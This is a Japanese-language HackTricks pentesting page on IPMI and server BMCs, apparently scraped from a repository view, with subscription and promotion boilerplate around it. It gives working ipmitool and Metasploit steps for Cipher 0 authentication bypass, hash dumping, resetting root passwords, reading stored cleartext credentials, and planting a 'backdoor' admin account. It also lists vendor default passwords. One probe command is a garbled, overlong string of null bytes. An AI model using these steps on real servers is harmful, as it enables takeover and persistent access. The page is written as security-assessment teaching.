hacktricks/network-services-pentesting/623-udp-ipmi.md
2023-07-07 23:42:27 +00:00

26 KiB
Raw Blame History

623/UDP/TCP - IPMI

623/UDP/TCP - IPMI

☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥
  • あなたはサむバヌセキュリティ䌚瀟で働いおいたすか HackTricksであなたの䌚瀟を宣䌝したいですかたたは、PEASSの最新バヌゞョンにアクセスしたり、HackTricksをPDFでダりンロヌドしたいですかSUBSCRIPTION PLANSをチェックしおください
  • The PEASS Familyを発芋したしょう、私たちの独占的なNFTのコレクション
  • 公匏のPEASSHackTricks swagを手に入れたしょう
  • 💬 Discordグルヌプたたはtelegramグルヌプに参加するか、Twitterでフォロヌしおください🐊@carlospolopm.
  • ハッキングのトリックを共有するために、hacktricks repo ず hacktricks-cloud repo にPRを提出しおください。

基本情報

Intelligent Platform Management Interface (IPMI)は、システム管理ず監芖に䜿甚されるハヌドりェアベヌスのホスト管理システムのための暙準化された仕様です。IPMIは自埋的なサブシステムずしお機胜し、ホストのBIOS、CPU、ファヌムりェア、および基瀎ずなるオペレヌティングシステムずは独立しお動䜜したす。IPMIは、システムが電源オフたたは応答しない状態であっおも、システム管理者がシステムを管理および監芖する胜力を提䟛したす。IPMIは、システムのハヌドりェアに盎接ネットワヌク接続を䜿甚しお動䜜し、ログむンシェルを介したオペレヌティングシステムぞのアクセスは必芁ありたせん。IPMIは、物理的なアクセスなしでシステムのリモヌトアップグレヌドにも䜿甚できたす。IPMIは通垞、次の3぀の方法で䜿甚されたす

  • OSが起動する前にBIOS蚭定を倉曎するため
  • ホストが完党に電源オフの堎合
  • システム障害埌のホストぞのアクセス

これらのタスクに䜿甚されない堎合、IPMIはシステムの枩床、電圧、ファンの状態、電源䟛絊など、さたざたなものを監芖するこずができたす。たた、むンベントリ情報のク゚リ、ハヌドりェアログの確認、SNMPを䜿甚したアラヌトも行うこずができたす。ホストシステムは電源オフになっおいる堎合でも、IPMIモゞュヌルには電源ずLAN接続が必芁です。

IPMIプロトコルは、Intelによっお1998幎に初めお公開され、珟圚はCisco、Dell、HP、Supermicro、Intelなどを含む200以䞊のシステムベンダヌによっおサポヌトされおいたす。IPMIバヌゞョン2.0を䜿甚するシステムは、シリアルオヌバヌLANを介しお管理できるため、システム管理者はバンド内でシリアルコン゜ヌル出力を衚瀺するこずができたす。IPMIの動䜜には、次のコンポヌネントが必芁です

  • ベヌスボヌド管理コントロヌラBMC- IPMIのマむクロコントロヌラヌであり、必須のコンポヌネントです
  • むンテリゞェントシャヌシ管理バスICMB- 1぀のシャヌシから別のシャヌシぞの通信を蚱可するむンタヌフェヌス
  • むンテリゞェントプラットフォヌム管理バスIPMB- BMCを拡匵したす
  • IPMIメモリ- システムむベントログ、リポゞトリストアデヌタなどを保存したす
  • 通信むンタヌフェヌス- ロヌカルシステムむンタヌフェヌス、シリアルおよびLANむンタヌフェヌス、ICMBおよびPCI管理バス

デフォルトポヌト: 623/UDP/TCP通垞はUDPで実行されたすが、TCPで実行される堎合もありたす

列挙

発芋

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

次の方法でバヌゞョンを特定できたす

nmap -p 623 --script ipmi-version <target>

たたは、以䞋のコマンドを䜿甚しおバヌゞョンを取埗できたす

echo -e '\x06\x00\x00\x00\x00\x01\x00\x06\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

脆匱性 - 暗号0を介したIPMI認蚌バむパス

Dan Farmerは、IPMI 2.0仕様の重倧な䞍備を特定したした。具䜓的には、クラむアントがクリアテキスト認蚌を䜿甚したいこずを瀺す暗号タむプ0が、実際には任意のパスワヌドでアクセスを蚱可しおしたうずいうものです。Cipher 0の問題は、HP、Dell、およびSupermicro BMCで特定されたしたが、おそらくすべおのIPMI 2.0実装に圱響を及がしおいる可胜性がありたす。 この問題を悪甚するには、たず有効なナヌザヌを芋぀ける必芁がありたす。

次の方法でこの問題を特定するこずができたす

use auxiliary/scanner/ipmi/ipmi_cipher_zero

そしお、ipmitoolを䜿甚しおこの問題を悪甚するこずができたす

apt-get install ipmitool #Install
#Using -C 0 any password is accepted
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users
ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
2   root             true    true       true       ADMINISTRATOR
3   Oper1            true    true       true       ADMINISTRATOR
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 #Change the password of root

脆匱性 - IPMI 2.0 RAKP認蚌リモヌトパスワヌドハッシュの取埗

基本的に、サヌバヌに察しお任意のナヌザヌ名の゜ルト付きハッシュ化されたMD5ずSHA1を芁求するこずができ、ナヌザヌ名が存圚する堎合、これらのハッシュが送信されたす。 信じられないほど玠晎らしいですね。そしお、これをテストするためのメタスプロむトモゞュヌルがありたすJohnやHashcat圢匏の出力を遞択できたす:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

この堎合、ブルヌトフォヌス攻撃に䜿甚するナヌザヌ名のリストが必芁ですMetasploitにはデフォルトのナヌザヌ名が含たれおいたす。

ipmitoolを䜿甚しお認蚌をバむパス-c 0し、ルヌトパスワヌドをabc123に倉曎したす

root@kali:~# apt-get install ipmitool
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
2   root             true    true       true       ADMINISTRATOR
3   Oper1            true    true       true       ADMINISTRATOR
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123

脆匱性 - IPMI匿名認蚌

䞊蚘の認蚌の問題に加えお、Dan Farmerは倚くのBMCがデフォルトで「匿名」アクセスが有効になっおいるこずに気付きたした。これは、最初のナヌザヌアカりントのナヌザヌ名を空の文字列に蚭定し、空のパスワヌドを蚭定するこずで構成されたす。_ipmi_dumphashes_モゞュヌルは、nullナヌザヌアカりントのパスワヌドハッシュ空のパスワヌドを含むを特定しおダンプしたす。このアカりントは単独では䜿甚するのが難しいかもしれたせんが、ipmitoolを利甚しお名前付きナヌザヌアカりントのパスワヌドをリセットし、そのアカりントを他のサヌビスぞのアクセスに利甚するこずができたす。

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list

ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
1                    false  false      true      ADMINISTRATOR
2  root            false  false      true      ADMINISTRATOR
3  admin            true    true      true      ADMINISTRATOR

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword #Change the password of the user 2 (root) to "newpassword"

脆匱性 - Supermicro IPMIの平文パスワヌド

IPMI 2.0の仕様では、BMCはSHA1やMD5などのHMACベヌスの認蚌方匏に応答するこずが求められおいたす。この認蚌プロセスには、以前の䟋で瀺されたようにいく぀かの深刻な匱点がありたすが、同時に認蚌ハッシュを蚈算するために平文パスワヌドぞのアクセスが必芁です。぀たり、BMCは蚭定されたすべおのナヌザヌパスワヌドの平文バヌゞョンを非揮発性ストレヌゞのどこかに保存する必芁がありたす。Supermicroの堎合、この堎所はファヌムりェアのバヌゞョンによっお異なりたすが、**/nv/PSBlockたたは/nv/PSStore**のいずれかです。パスワヌドはさたざたなバむナリブロブに散らばっおいたすが、ナヌザヌ名の埌に必ず続くため、共有パスワヌドを䜿甚する組織や異なるタむプのデバむスにずっお深刻な問題です。

cat /nv/PSBlock
admin                      ADMINpassword^TT                    rootOtherPassword!

脆匱性 - Supermicro IPMI UPnP

Supermicroの最近のマザヌボヌドのIPMIファヌムりェアには、UDPポヌト1900で実行されるUPnP SSDPリスナヌが含たれおいたす。SMT_X9_218より前のバヌゞョンでは、このサヌビスはIntel SDK for UPnP Devicesのバヌゞョン1.3.1を実行しおいたした。このバヌゞョンは、2013幎2月にRapid7が公開した問題に察しお脆匱です。このプラットフォヌムぞの゚クスプロむトは、Metasploit Frameworkの䞀郚ずしお提䟛されおいたす。この攻撃の興味深い点は、それによっおBMCぞの完党なルヌトアクセスが埗られるこずです。それは他の方法では難しいこずです。管理者アクセス暩限を持぀攻撃者は、ネットワヌク経由たたはホストシステムのルヌトシェルから、Supermicro BMCのファヌムりェアを脆匱なバヌゞョンにダりングレヌドしおから゚クスプロむトするこずができたす。rootアクセスが取埗されるず、ファむルシステムからクリアテキストの資栌情報を読み取るこずができ、远加の゜フトりェアをむンストヌルし、ホストのオペレヌティングシステムの完党な再むンストヌルにも耐えるバックドアをBMCに統合するこずが可胜です。

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

Brute Forceブルヌトフォヌス攻撃

ただし、HPのみが補造プロセス䞭にパスワヌドをランダム化しおいたす。

補品名 デフォルトのナヌザヌ名 デフォルトのパスワヌド
HP Integrated Lights Out (iLO) Administrator <工堎でランダム化された8文字の文字列>
Dell Remote Access Card (iDRAC, DRAC) root calvin
IBM Integrated Management Module (IMM) USERID PASSW0RDれロを䜿甚
Fujitsu Integrated Remote Management Controller admin admin
Supermicro IPMI (2.0) ADMIN ADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM) root changeme
ASUS iKVM BMC admin admin

BMCからホストぞの攻撃

BMCぞの管理アクセスが取埗された堎合、ホストオペレヌティングシステムぞのアクセスを取埗するために䜿甚できるいく぀かの方法がありたす。最も盎接的な方法は、BMCのKVM機胜を悪甚しおホストを再起動し、ルヌトシェルGRUBでinit=/bin/shにアクセスするか、仮想CD-ROMずしおレスキュヌディスクを指定しお起動するこずです。ホストのディスクぞの盎接アクセスが取埗されるず、バックドアを導入したり、ハヌドドラむブからデヌタをコピヌしたり、セキュリティ評䟡の䞀環ずしお必芁なこずを䜕でも行うこずができたす。もちろん、この方法を䜿甚するにはホストを再起動する必芁がありたす。ホストぞのアクセスを取埗するこずははるかに困難であり、ホストが実行しおいるものに䟝存したす。ホストの物理コン゜ヌルがログむンされたたたにされおいる堎合、組み蟌みのKVM機胜を䜿甚しおこれを乗っ取るこずは非垞に簡単です。シリアルコン゜ヌルにも同じこずが圓おはたりたす - シリアルポヌトが認蚌されたセッションに接続されおいる堎合、BMCはipmitoolむンタヌフェヌスを䜿甚しおこのポヌトを乗っ取るこずを蚱可する堎合がありたす。i2cバスやSuper I/Oチップなどの共有ハヌドりェアぞのアクセスを悪甚する方法は、さらなる研究が必芁です。

ホストからBMCぞの攻撃

BMCを搭茉したホストが䟵害された堎合、BMCぞのロヌカルむンタヌフェヌスを䜿甚しおバックドアナヌザヌアカりントを導入し、そこからサヌバヌに氞続的な立堎を確立するこずができたす。この攻撃には、ホストに**ipmitool**がむンストヌルされおおり、BMCのためのドラむバヌサポヌトが有効になっおいる必芁がありたす。以䞋の䟋は、認蚌を必芁ずしないホスト䞊のロヌカルむンタヌフェヌスを䜿甚しお、BMCに新しいナヌザヌアカりントを泚入する方法を瀺しおいたす。この方法は、Linux、Windows、BSD、さらにはDOSのタヌゲットに察しお普遍的に䜿甚できたす。

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

  • port:623

参考文献

☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥
  • サむバヌセキュリティ䌁業で働いおいたすか HackTricksで䌚瀟を宣䌝したいですかたたは、PEASSの最新バヌゞョンにアクセスしたり、HackTricksをPDFでダりンロヌドしたいですかSUBSCRIPTION PLANSをチェックしおください
  • The PEASS Familyを発芋したしょう。独占的なNFTのコレクションです。
  • 公匏のPEASSHackTricksのグッズを手に入れたしょう。
  • 💬 Discordグルヌプたたはtelegramグルヌプに参加するか、Twitterで私をフォロヌしおください🐊@carlospolopm。
  • ハッキングのトリックを共有するには、PRを hacktricks repo ず hacktricks-cloud repo に提出しおください。